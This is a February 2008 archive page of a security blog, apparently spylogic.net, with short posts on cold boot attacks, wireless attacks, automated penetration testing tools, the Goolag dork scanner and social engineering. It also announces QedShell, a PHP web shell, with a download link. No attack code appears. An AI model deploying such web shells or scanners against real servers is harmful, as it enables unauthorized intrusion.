Monthly Archives: February 2008

Cold Boot Attacks on Encryption Keys- Whats the risk?

1
Posted by agent0x0 on February 28, 2008 – 12:10 am
Filed under Cryptography

I am sure everyone has heard about and watched the YouTube video of the Princeton researchers that conduct cold boot attacks on encrypted hard disks. If you haven’t, I highly suggest you do. As everyone agrees…this is a very significant vulnerability and every organization that uses software to encrypt hard disks should look at ways to mitigate this new risk.

There are a ton of articles already about this new threat so I won’t bore you with the details…however, I have found one posted by Rich over at Securosis.com that sums up the entire issue and what risk this might have for your organization.

One thing I would like to highlight in his article is that you should contact the vendor of the hard disk encryption product you use to see if they plan to address this new vulnerability. It will only be a matter of time until the first tool is out there in the wild and actively exploited on stolen laptops.

802.11 Attacks Whitepaper

0
Posted by agent0x0 on February 26, 2008 – 3:20 pm
Filed under Wireless Security

<%image(20060811-wireless access point.jpg|136|94|Wireless!)%>

Foundstone always puts together great research and releases great tools.

The other day Foundstone released a whitepaper describing all of the new and old 802.11 (Wireless) attacks. The paper gives some really good information about AP Impersonation, Rogue Access Points, Implementation Attacks (WEP, Dynamic WEP, WPA/WPA-2 cracking, including the Cafe Latte attack). The paper even goes into wireless client adapters and wireless DoS attacks.

If you conduct wireless penetration tests or want to know more about wireless security, I highly recommend you read this paper. You can download the 802.11 Attacks whitepaper directly from Foundstone.

Automated Penetration Testing with CORE IMPACT

2
Posted by agent0x0 on February 25, 2008 – 10:45 am
Filed under Penetration Testing

< %image(20080225-logo_core_impact.gif|194|50|CORE IMPACT)%>

Last week I spoke at a local security professionals user group about Automated Penetration Testing with CORE IMPACT (from Core Security Technologies). There has been some great developments in the automated penetration testing area recently with commercial tools like CORE IMPACT and Immunity’s CANVAS. However, lets not forget about recent advancements with open source solutions like Metasploit 3. All of these products perform automated penetration testing.

Instead of posting my slide deck I will highlight some of the key points below. Note that this is presented from the perspective of a customer, this was not a sales pitch for CORE IMPACT even though they do have a great product. Next month I will be speaking about Metasploit 3, specifically talking about the autopwn feature which automates exploiting network hosts. One thing I want to mention, automated penetration testing should never replace detailed manual penetration testing! You should use these tools to supplement your tool kit, not replace them!
Read More »

Goolag Scanner – Google Vulnerability Scanner Released

2
Posted by agent0x0 on February 22, 2008 – 11:14 am
Filed under Hacking

<%image(20080222-goolag.gif|228|84|Goolag Scanner)%>

The infamous Cult of the Dead Cow (cDc) has released a very cool Google vulnerability scanner called Goolag Scanner. This tool allows you to search a specific web site or domain for known vulnerabilities and misconfigurations.

From an eWeek article:

“The open-source program comes with about 1,500 custom Google search queries embedded by default to run searches for vulnerable Web applications, misconfigured Web servers with open backdoors, sensitive user names and passwords, and other documents accidentally exposed on the Internet.”

From the cDc press release:

“It’s no big secret that the Web is the platform,” said cDc spokesmodel Oxblood Ruffin. “And this platform pretty much sucks from a security perspective. Goolag Scanner provides one more tool for web site owners to patch up their online properties. We’ve seen some pretty scary holes through random tests with the scanner in North America, Europe, and the Middle East. If I were a government, a large corporation, or anyone with a large web site, I’d be downloading this beast and aiming it at my site yesterday. The vulnerabilities are that serious.”

Looks like they took Johnny Long’s “Google Dorks” search queries and put them into an automated tool. Very nice. Right now the tool only runs on Windows (.NET) but it looks like they will soon release it for other platforms. Nice to see all of these search queries put into a easy to use interface. Goolag Scanner and Maltego make fantastic additions to your pentest reconnaissance toolkit. You can download Goolag Scanner here.

Notacon 5: April 4-6 Cleveland, Ohio

0
Posted by agent0x0 on February 21, 2008 – 9:37 am
Filed under Hacking

If you are in the Cleveland, Ohio area you should check out the local con called Notacon. Similar to Defcon or ShmooCon but much smaller and in my opinion more unique. From the Notacon web site:

“NOTACON, an annual conference held in Cleveland, Ohio, explores and showcases technologies, philosophy and creativity often overlooked at other “hacker cons”. Our desire is not to supplant other events, but complement them and strike a balance that has gone unnoticed in our community for far too long.

With each new year we build upon the successes and knowledge of the previous years. Our goal is to enlighten, educate, and entertain attendees, presenters, and staff alike. We try to do this by finding new ways to apply technology to graphics, art, music, or social interaction.

Notacon espouses an ethos of exploration, participation and positive contributions. Hence, while some of the material we may cover is controversial or potentially “black hat” in nature, we feel it is important to bring light to all topics so that everyone can learn from the experience and create something good, fun or interesting from it.

Events during Notacon run from Friday morning through Sunday afternoon. These include over 40 presentations, contests such as “Anything but Ethernet”, game shows, prize giveaways and a whole lot of who-knows-what. Anything can happen, and usually does. “

It’s also affordable! $50 gets you into the con for the whole weekend. Looks like they have some interesting talks planned including “Bagcam – How did TSA and/or the airlines manage to do that to your luggage?” and the “Exploit-Me Series: Firefox Plug-ins for Application Penetration Testing”.

PHP File Include Attacks Explained

0
Posted by agent0x0 on February 19, 2008 – 3:57 pm
Filed under Hacking

If you have been checking out Quzart’s QedShell v2.0 article and want to know more about PHP file include attacks and how they work…be sure to check out this fantastic four part series about these attacks on TippingPoint’s DV Labs blog. I have yet to find a more comprehensive article on this subject.

Social Networks and Personal Information

0
Posted by agent0x0 on February 19, 2008 – 10:18 am
Filed under Security Awareness

<%image(20080219-linkedin.jpg|137|43|LinkedIn)%>

Good post over at GNUCITIZEN today. They talk about how easy it would be for a hacker to social engineer their way into LinkedIn connections to get information about a potential business target, possibly even your company or business.

Social networking in general is very popular with security minded and non-security minded people. I use LinkedIn as well as many other security professionals because of the obvious career benefits. Even a gray hat/black hat hacker can use LinkedIn to further a legitimate career in the corporate world by getting a LinkedIn connection by doing a project for Hackers for Charity. It’s all about what you perceive your “personal risk” is associated with using a site like LinkedIn. The benefit may outweigh the risk in your case. Here are a few tips that you can do to help “minimize” your personal information exposure:

1. Do not make your LinkedIn profile public
2. Only accept connections from people you know and/or have personally worked with.

For example, if you own your own business you may want a public profile available to generate business. Again, this all depends on your personal risk assessment of your personal information.

QedShell v2.0

0
Posted by Quzart on February 16, 2008 – 3:39 pm
Filed under Penetration Testing

c 99shell from the ccteam was a great PHP script, unfortunately support is discontinued. The idea is to have an all-in-one file to administrate a server once that file is uploaded.
When you look into the source of the c 99shell it is a bit chaotic and it even is detected by some anti-virus programs. For these reasons I wrote the code of QedShell from scratch.
This project is also aimed to help learn PHP, for that reason I commented almost every line.

Download it here:
http://fronted.quzart.nl/component/option,com_remository/func,fileinfo/id,11/

Read More »

Wireless Headset Dangers

0
Posted by agent0x0 on February 16, 2008 – 10:52 am
Filed under Wireless Security

<%image(20080216-plantronics.jpg|127|127|Wireless Headset)%>

I was listening to the latest Security Now podcast and Steve Gibson mentioned an interesting social engineering attack where some penetration testers were able to pose as employees just by listening to conference call and other telephone conversations across the street from the company facility. They used a police scanner dialed into the 800-900 Mhz range to pickup the signals of unsecured wireless headsets (very popular with many companies). There was also a very good article on this posted on Dark Reading that is a must read about this attack.

New blogger

0
Posted by agent0x0 on February 15, 2008 – 9:29 pm
Filed under Spylogic News

Welcome Quzart to the spylogic.net team!

Another blogger from the Netherlands named Quzart will be posting an article on the revised c 99shell php script. Keep an eye out for it. Thanks Quzart!